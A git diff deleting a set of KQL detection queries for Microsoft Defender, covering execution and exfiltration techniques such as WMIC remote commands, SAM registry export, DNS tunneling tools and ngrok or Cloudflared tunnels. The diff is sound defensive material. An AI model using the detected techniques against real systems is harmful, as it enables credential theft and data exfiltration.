@@ -1,7 +0,0 @@ -// Author: bohops, Bhabesh Raj -// Date: 2021/10/08 -// Level: high -// Description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup -// Tags: attack.execution, attack.persistence, attack.t1059 -DeviceProcessEvents -| where (((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (ProcessVersionInfoOriginalFileName in~ ("Cmd.Exe", "cscript.exe", "MSHTA.EXE", "PowerShell.EXE", "pwsh.dll", "REGSVR32.EXE", "RUNDLL32.EXE", "wscript.exe"))) and InitiatingProcessFolderPath endswith "\\vmtoolsd.exe") and (not(((ProcessCommandLine =~ "" and FolderPath endswith "\\cmd.exe") or (isnull(ProcessCommandLine) and FolderPath endswith "\\cmd.exe") or ((ProcessCommandLine contains "\\VMware\\VMware Tools\\poweron-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\poweroff-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\resume-vm-default.bat" or ProcessCommandLine contains "\\VMware\\VMware Tools\\suspend-vm-default.bat") and FolderPath endswith "\\cmd.exe")))) \ No newline at end of file diff --git a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql b/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql deleted file mode 100644 index 76373e3d..00000000 --- a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Arbitrary_Binary_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/11 -// Level: medium -// Description: Detects child processes of Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where InitiatingProcessFolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe" \ No newline at end of file diff --git a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql b/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql deleted file mode 100644 index 275a6408..00000000 --- a/Execution/Visual_Studio_NodejsTools_PressAnyKey_Renamed_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems) -// Date: 2023/04/11 -// Level: medium -// Description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries -// Tags: attack.execution, attack.defense_evasion, attack.t1218 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "Microsoft.NodejsTools.PressAnyKey.exe" and (not(FolderPath endswith "\\Microsoft.NodejsTools.PressAnyKey.exe")) \ No newline at end of file diff --git a/Execution/WMIC_Remote_Command_Execution.kql b/Execution/WMIC_Remote_Command_Execution.kql deleted file mode 100644 index 11a8cfda..00000000 --- a/Execution/WMIC_Remote_Command_Execution.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/14 -// Level: medium -// Description: Detects the execution of WMIC to query information on a remote system -// Tags: attack.execution, attack.t1047 -DeviceProcessEvents -| where (ProcessCommandLine contains "/node:" and (FolderPath endswith "\\WMIC.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")) and (not((ProcessCommandLine contains "/node:127.0.0.1 " or ProcessCommandLine contains "/node:localhost "))) \ No newline at end of file diff --git a/Execution/WSL_Child_Process_Anomaly.kql b/Execution/WSL_Child_Process_Anomaly.kql deleted file mode 100644 index 83b49b76..00000000 --- a/Execution/WSL_Child_Process_Anomaly.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/23 -// Level: medium -// Description: Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL -// Tags: attack.execution, attack.defense_evasion, attack.t1218, attack.t1202 -DeviceProcessEvents -| where (InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wslhost.exe") and ((FolderPath endswith "\\calc.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\wscript.exe") or (FolderPath contains "\\AppData\\Local\\Temp\\" or FolderPath contains "C:\\Users\\Public\\" or FolderPath contains "C:\\Windows\\Temp\\" or FolderPath contains "C:\\Temp\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Desktop\\")) \ No newline at end of file 
diff --git a/Execution/WScript_or_CScript_Dropper_-_File.kql b/Execution/WScript_or_CScript_Dropper_-_File.kql deleted file mode 100644 index 4bd91b3d..00000000 --- a/Execution/WScript_or_CScript_Dropper_-_File.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Shelton -// Date: 2022/01/10 -// Level: high -// Description: Detects a file ending in jse, vbe, js, vba, vbs written by cscript.exe or wscript.exe -// Tags: attack.execution, attack.t1059.005, attack.t1059.007 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe") and (FolderPath endswith ".jse" or FolderPath endswith ".vbe" or FolderPath endswith ".js" or FolderPath endswith ".vba" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Users\\" or FolderPath startswith "C:\\ProgramData") \ No newline at end of file diff --git a/Execution/Wab_Execution_From_Non_Default_Location.kql b/Execution/Wab_Execution_From_Non_Default_Location.kql deleted file mode 100644 index 0ce9c87e..00000000 --- a/Execution/Wab_Execution_From_Non_Default_Location.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/08/12 -// Level: high -// Description: Detects execution of wab.exe (Windows Contacts) and Wabmig.exe (Microsoft Address Book Import Tool) from non default locations as seen with bumblebee activity -// Tags: attack.defense_evasion, attack.execution -DeviceProcessEvents -| where (FolderPath endswith "\\wab.exe" or FolderPath endswith "\\wabmig.exe") and (not((FolderPath startswith "C:\\Windows\\WinSxS\\" or FolderPath startswith "C:\\Program Files\\Windows Mail\\" or FolderPath startswith "C:\\Program Files (x86)\\Windows Mail\\"))) \ No newline at end of file diff --git a/Execution/Weak_or_Abused_Passwords_In_CLI.kql b/Execution/Weak_or_Abused_Passwords_In_CLI.kql deleted file mode 100644 index 495f7484..00000000 --- a/Execution/Weak_or_Abused_Passwords_In_CLI.kql +++ /dev/null 
@@ -1,9 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/14 -// Level: medium -// Description: Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. -An example would be a threat actor creating a new user via the net command and providing the password inline - -// Tags: attack.defense_evasion, attack.execution -DeviceProcessEvents -| where ProcessCommandLine contains "123456789" or ProcessCommandLine contains "123123qwE" or ProcessCommandLine contains "Asd123.aaaa" or ProcessCommandLine contains "Decryptme" or ProcessCommandLine contains "P@ssw0rd!" or ProcessCommandLine contains "Pass8080" or ProcessCommandLine contains "password123" or ProcessCommandLine contains "test@202" \ No newline at end of file diff --git a/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql b/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql deleted file mode 100644 index 22255567..00000000 --- a/Execution/WinSxS_Executable_File_Creation_By_Non-System_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/11 -// Level: medium -// Description: Detects the creation of binaries in the WinSxS folder by non-system processes -// Tags: attack.execution -DeviceFileEvents -| where (FolderPath endswith ".exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\Systems32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))) \ No newline at end of file diff --git a/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql b/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index cc9098f3..00000000 --- a/Execution/Windows_Hotfix_Updates_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null 
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/06/20
-// Level: medium
-// Description: Detects the execution of wmic with the "qfe" flag in order to obtain information about installed hotfix updates on the system. This is often used by pentester and attacker enumeration scripts
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where ProcessCommandLine contains " qfe" and (ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")
\ No newline at end of file
diff --git a/Execution/WmiPrvSE_Spawned_A_Process.kql b/Execution/WmiPrvSE_Spawned_A_Process.kql
deleted file mode 100644
index 548475bc..00000000
--- a/Execution/WmiPrvSE_Spawned_A_Process.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez @Cyb3rWard0g
-// Date: 2019/08/15
-// Level: medium
-// Description: Detects WmiPrvSE spawning a process
-// Tags: attack.execution, attack.t1047
-DeviceProcessEvents
-| where InitiatingProcessFolderPath endswith "\\WmiPrvSe.exe" and (not(((LogonId in~ ("0x3e7", "null")) or isnull(LogonId) or (AccountName contains "AUTHORI" or AccountName contains "AUTORI") or FolderPath endswith "\\WerFault.exe" or FolderPath endswith "\\WmiPrvSE.exe")))
\ No newline at end of file
diff --git a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql b/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql
deleted file mode 100644
index 631d57e9..00000000
--- a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: high
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceImageLoadEvents
-| where FolderPath endswith "\\wbem\\wbemcomn.dll" and InitiatingProcessFolderPath endswith "\\wmiprvse.exe"
\ No newline at end of file
diff --git a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql b/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql
deleted file mode 100644
index 60ed5e82..00000000
--- a/Execution/Wmiprvse_Wbemcomn_DLL_Hijack_-_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/10/12
-// Level: critical
-// Description: Detects a threat actor creating a file named `wbemcomn.dll` in the `C:\Windows\System32\wbem\` directory over the network and loading it for a WMI DLL Hijack scenario.
-// Tags: attack.execution, attack.t1047, attack.lateral_movement, attack.t1021.002
-DeviceFileEvents
-| where InitiatingProcessFolderPath =~ "System" and FolderPath endswith "\\wbem\\wbemcomn.dll"
\ No newline at end of file
diff --git a/Execution/Wscript_Shell_Run_In_CommandLine.kql b/Execution/Wscript_Shell_Run_In_CommandLine.kql
deleted file mode 100644
index c0512515..00000000
--- a/Execution/Wscript_Shell_Run_In_CommandLine.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/31
-// Level: medium
-// Description: Detects the presence of the keywords "Wscript", "Shell" and "Run" in the command, which could indicate a suspicious activity
-// Tags: attack.execution, attack.t1059
-DeviceProcessEvents
-| where ProcessCommandLine contains "Wscript." and ProcessCommandLine contains ".Shell" and ProcessCommandLine contains ".Run"
\ No newline at end of file
diff --git a/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql b/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql
deleted file mode 100644
index e16627c1..00000000
--- a/Execution/Wusa.EXE_Executed_By_Parent_Process_Located_In_Suspicious_Location.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: X__Junior (Nextron Systems)
-// Date: 2023/11/26
-// Level: high
-// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location.
-
-// Tags: attack.execution
-DeviceProcessEvents
-| where FolderPath endswith "\\wusa.exe" and ((InitiatingProcessFolderPath contains ":\\Perflogs\\" or InitiatingProcessFolderPath contains ":\\Users\\Public\\" or InitiatingProcessFolderPath contains ":\\Windows\\Temp\\" or InitiatingProcessFolderPath contains "\\Appdata\\Local\\Temp\\" or InitiatingProcessFolderPath contains "\\Temporary Internet") or ((InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favorites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Favourites\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Contacts\\") or (InitiatingProcessFolderPath contains ":\\Users\\" and InitiatingProcessFolderPath contains "\\Pictures\\")))
\ No newline at end of file
diff --git a/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql b/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql
deleted file mode 100644
index c319c717..00000000
--- a/Execution/Wusa.EXE_Extracting_Cab_Files_From_Suspicious_Paths.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/05
-// Level: high
-// Description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument from suspicious paths
-// Tags: attack.execution
-DeviceProcessEvents
-| where (ProcessCommandLine contains ":\\PerfLogs\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Temp\\" or ProcessCommandLine contains "\\Appdata\\Local\\Temp\\") and (ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe")
\ No newline at end of file
diff --git a/Execution/Wusa_Extracting_Cab_Files.kql b/Execution/Wusa_Extracting_Cab_Files.kql
deleted file mode 100644
index 13b35564..00000000
--- a/Execution/Wusa_Extracting_Cab_Files.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/08/04
-// Level: medium
-// Description: Detects usage of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument which is not longer supported. This could indicate an attacker using an old technique
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe"
\ No newline at end of file
diff --git a/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql b/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql
deleted file mode 100644
index bd2befa9..00000000
--- a/Execution/XBAP_Execution_From_Uncommon_Locations_Via_PresentationHost.EXE.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2022/07/01
-// Level: medium
-// Description: Detects the execution of ".xbap" (Browser Applications) files via PresentationHost.EXE from an uncommon location. These files can be abused to run malicious ".xbap" files any bypass AWL
-
-// Tags: attack.defense_evasion, attack.execution, attack.t1218
-DeviceProcessEvents
-| where (ProcessCommandLine contains ".xbap" and (FolderPath endswith "\\presentationhost.exe" or ProcessVersionInfoOriginalFileName =~ "PresentationHost.exe")) and (not((ProcessCommandLine contains " C:\\Windows\\" or ProcessCommandLine contains " C:\\Program Files")))
\ No newline at end of file
diff --git a/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql b/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
deleted file mode 100644
index f4819e7d..00000000
--- a/Exfiltration/Active_Directory_Structure_Export_Via_Csvde.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.
-// Tags: attack.exfiltration, attack.discovery, attack.t1087.002
-DeviceProcessEvents
-| where ((FolderPath endswith "\\csvde.exe" or ProcessVersionInfoOriginalFileName =~ "csvde.exe") and ProcessCommandLine contains " -f") and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql b/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql
deleted file mode 100644
index bb23104b..00000000
--- a/Exfiltration/Active_Directory_Structure_Export_Via_Ldifde.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/03/14
-// Level: medium
-// Description: Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.
-// Tags: attack.exfiltration
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-f" and (FolderPath endswith "\\ldifde.exe" or ProcessVersionInfoOriginalFileName =~ "ldifde.exe")) and (not(ProcessCommandLine contains " -i"))
\ No newline at end of file
diff --git a/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql b/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql
deleted file mode 100644
index 35c6c056..00000000
--- a/Exfiltration/Arbitrary_File_Download_Via_ConfigSecurityPolicy.EXE.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: frack113
-// Date: 2021/11/26
-// Level: medium
-// Description: Detects the execution of "ConfigSecurityPolicy.EXE", a binary part of Windows Defender used to manage settings in Windows Defender.
-Users can configure different pilot collections for each of the co-management workloads.
-It can be abused by attackers in order to upload or download files.
-
-// Tags: attack.exfiltration, attack.t1567
-DeviceProcessEvents
-| where (ProcessCommandLine contains "ConfigSecurityPolicy.exe" or FolderPath endswith "\\ConfigSecurityPolicy.exe" or ProcessVersionInfoOriginalFileName =~ "ConfigSecurityPolicy.exe") and (ProcessCommandLine contains "ftp://" or ProcessCommandLine contains "http://" or ProcessCommandLine contains "https://")
\ No newline at end of file
diff --git a/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql b/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql
deleted file mode 100644
index 7585af33..00000000
--- a/Exfiltration/Communication_To_Ngrok_Tunneling_Service_Initiated.kql
+++ /dev/null
@@ -1,10 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022/11/03
-// Level: high
-// Description: Detects an executable initiating a network connection to "ngrok" tunneling domains.
-Attackers were seen using this "ngrok" in order to store their second stage payloads and malware.
-While communication with such domains can be legitimate, often times is a sign of either data exfiltration by malicious actors or additional download.
-
-// Tags: attack.exfiltration, attack.command_and_control, attack.t1567, attack.t1568.002, attack.t1572, attack.t1090, attack.t1102, attack.s0508
-DeviceNetworkEvents
-| where RemoteUrl contains "tunnel.us.ngrok.com" or RemoteUrl contains "tunnel.eu.ngrok.com" or RemoteUrl contains "tunnel.ap.ngrok.com" or RemoteUrl contains "tunnel.au.ngrok.com" or RemoteUrl contains "tunnel.sa.ngrok.com" or RemoteUrl contains "tunnel.jp.ngrok.com" or RemoteUrl contains "tunnel.in.ngrok.com"
\ No newline at end of file
diff --git a/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql b/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql
deleted file mode 100644
index c32def88..00000000
--- a/Exfiltration/Compressed_File_Creation_Via_Tar.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), AdmU3
-// Date: 2023/12/19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to create a compressed file.
-Adversaries may abuse various utilities to compress or encrypt data before exfiltration.
-
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-DeviceProcessEvents
-| where (ProcessCommandLine contains "-c" or ProcessCommandLine contains "-r" or ProcessCommandLine contains "-u") and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql b/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql
deleted file mode 100644
index f02eb771..00000000
--- a/Exfiltration/Compressed_File_Extraction_Via_Tar.EXE.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: AdmU3
-// Date: 2023/12/19
-// Level: low
-// Description: Detects execution of "tar.exe" in order to extract compressed file.
-Adversaries may abuse various utilities in order to decompress data to avoid detection.
-
-// Tags: attack.collection, attack.exfiltration, attack.t1560, attack.t1560.001
-DeviceProcessEvents
-| where ProcessCommandLine contains "-x" and (FolderPath endswith "\\tar.exe" or ProcessVersionInfoOriginalFileName =~ "bsdtar")
\ No newline at end of file
diff --git a/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql b/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
deleted file mode 100644
index 2846d8ff..00000000
--- a/Exfiltration/Copy_From_Or_To_Admin_Share_Or_Sysvol_Folder.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems), oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, Nasreddine Bencherchali
-// Date: 2019/12/30
-// Level: medium
-// Description: Detects a copy command or a copy utility execution to or from an Admin share or remote
-// Tags: attack.lateral_movement, attack.collection, attack.exfiltration, attack.t1039, attack.t1048, attack.t1021.002
-DeviceProcessEvents
-| where ((ProcessCommandLine contains "\\" and ProcessCommandLine contains "$") or ProcessCommandLine contains "\\Sysvol\\") and (((FolderPath endswith "\\robocopy.exe" or FolderPath endswith "\\xcopy.exe") or (ProcessVersionInfoOriginalFileName in~ ("robocopy.exe", "XCOPY.EXE"))) or (ProcessCommandLine contains "copy" and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe")) or ((ProcessCommandLine contains "copy-item" or ProcessCommandLine contains "copy " or ProcessCommandLine contains "cpi " or ProcessCommandLine contains " cp " or ProcessCommandLine contains "move " or ProcessCommandLine contains "move-item" or ProcessCommandLine contains " mi " or ProcessCommandLine contains " mv ") and ((FolderPath contains "\\powershell.exe" or FolderPath contains "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))))
\ No newline at end of file
diff --git a/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql b/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql
deleted file mode 100644
index 03a3a05c..00000000
--- a/Exfiltration/DNS_Exfiltration_and_Tunneling_Tools_Execution.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Daniil Yugoslavskiy, oscd.community
-// Date: 2019/10/24
-// Level: high
-// Description: Well-known DNS Exfiltration tools execution
-// Tags: attack.exfiltration, attack.t1048.001, attack.command_and_control, attack.t1071.004, attack.t1132.001
-DeviceProcessEvents
-| where FolderPath endswith "\\iodine.exe" or FolderPath contains "\\dnscat2"
\ No newline at end of file
diff --git a/Exfiltration/Email_Exifiltration_Via_Powershell.kql b/Exfiltration/Email_Exifiltration_Via_Powershell.kql
deleted file mode 100644
index 1dbebea8..00000000
--- a/Exfiltration/Email_Exifiltration_Via_Powershell.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems), Azure-Sentinel (idea)
-// Date: 2022/09/09
-// Level: high
-// Description: Detects email exfiltration via powershell cmdlets
-// Tags: attack.exfiltration
-DeviceProcessEvents
-| where (ProcessCommandLine contains "Add-PSSnapin" and ProcessCommandLine contains "Get-Recipient" and ProcessCommandLine contains "-ExpandProperty" and ProcessCommandLine contains "EmailAddresses" and ProcessCommandLine contains "SmtpAddress" and ProcessCommandLine contains "-hidetableheaders") and (FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe")
\ No newline at end of file
diff --git a/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql b/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql
deleted file mode 100644
index 4eea2e37..00000000
--- a/Exfiltration/Exports_Critical_Registry_Keys_To_a_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/12
-// Level: high
-// Description: Detects the export of a crital Registry key to a file.
-// Tags: attack.exfiltration, attack.t1012
-DeviceProcessEvents
-| where (ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E ") and (ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")
\ No newline at end of file
diff --git a/Exfiltration/Exports_Registry_Key_To_a_File.kql b/Exfiltration/Exports_Registry_Key_To_a_File.kql
deleted file mode 100644
index 77d9247a..00000000
--- a/Exfiltration/Exports_Registry_Key_To_a_File.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Oddvar Moe, Sander Wiebing, oscd.community
-// Date: 2020/10/07
-// Level: low
-// Description: Detects the export of the target Registry key to a file.
-// Tags: attack.exfiltration, attack.t1012
-DeviceProcessEvents
-| where ((ProcessCommandLine contains " -E " or ProcessCommandLine contains " /E ") and (FolderPath endswith "\\regedit.exe" or ProcessVersionInfoOriginalFileName =~ "REGEDIT.EXE")) and (not(((ProcessCommandLine contains "hklm" or ProcessCommandLine contains "hkey_local_machine") and (ProcessCommandLine endswith "\\system" or ProcessCommandLine endswith "\\sam" or ProcessCommandLine endswith "\\security"))))
\ No newline at end of file
diff --git a/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql b/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql
deleted file mode 100644
index ccb7d091..00000000
--- a/Exfiltration/LOLBAS_Data_Exfiltration_by_DataSvcUtil.exe.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger
-// Date: 2021/09/30
-// Level: medium
-// Description: Detects when a user performs data exfiltration by using DataSvcUtil.exe
-// Tags: attack.exfiltration, attack.t1567
-DeviceProcessEvents
-| where (ProcessCommandLine contains "/in:" or ProcessCommandLine contains "/out:" or ProcessCommandLine contains "/uri:") and (FolderPath endswith "\\DataSvcUtil.exe" or ProcessVersionInfoOriginalFileName =~ "DataSvcUtil.exe")
\ No newline at end of file
diff --git a/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql b/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql
deleted file mode 100644
index a9c40d3a..00000000
--- a/Exfiltration/Network_Communication_Initiated_To_Portmap.IO_Domain.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Florian Roth (Nextron Systems)
-// Date: 2024/05/31
-// Level: medium
-// Description: Detects an executable accessing the portmap.io domain, which could be a sign of forbidden C2 traffic or data exfiltration by malicious actors
-// Tags: attack.t1041, attack.command_and_control, attack.t1090.002, attack.exfiltration
-DeviceNetworkEvents
-| where RemoteUrl endswith ".portmap.io"
\ No newline at end of file
diff --git a/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql b/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql
deleted file mode 100644
index 1f2dad0d..00000000
--- a/Exfiltration/Network_Connection_Initiated_To_Cloudflared_Tunnels_Domains.kql
+++ /dev/null
@@ -1,9 +0,0 @@
-// Author: Kamran Saifullah, Nasreddine Bencherchali (Nextron Systems)
-// Date: 2024/05/27
-// Level: medium
-// Description: Detects network connections to Cloudflared tunnels domains initiated by a process on the system.
-Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
-// Tags: attack.exfiltration, attack.command_and_control, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith ".v2.argotunnel.com" or RemoteUrl endswith "protocol-v2.argotunnel.com" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "update.argotunnel.com"
\ No newline at end of file
diff --git a/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql b/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql
deleted file mode 100644
index 8e3e38f9..00000000
--- a/Exfiltration/Network_Connection_Initiated_To_DevTunnels_Domain.kql
+++ /dev/null
@@ -1,8 +0,0 @@
-// Author: Kamran Saifullah
-// Date: 2023/11/20
-// Level: medium
-// Description: Detects network connections to Devtunnels domains initiated by a process on a system. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.
-
-// Tags: attack.exfiltration, attack.t1567.001
-DeviceNetworkEvents
-| where RemoteUrl endswith ".devtunnels.ms"
\ No newline at end of file
diff --git a/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql b/Exfiltration/Network_Connection_Initiated_To_Mega.nz.kql
deleted file mode 100644
index 8b99a5d5..00000000
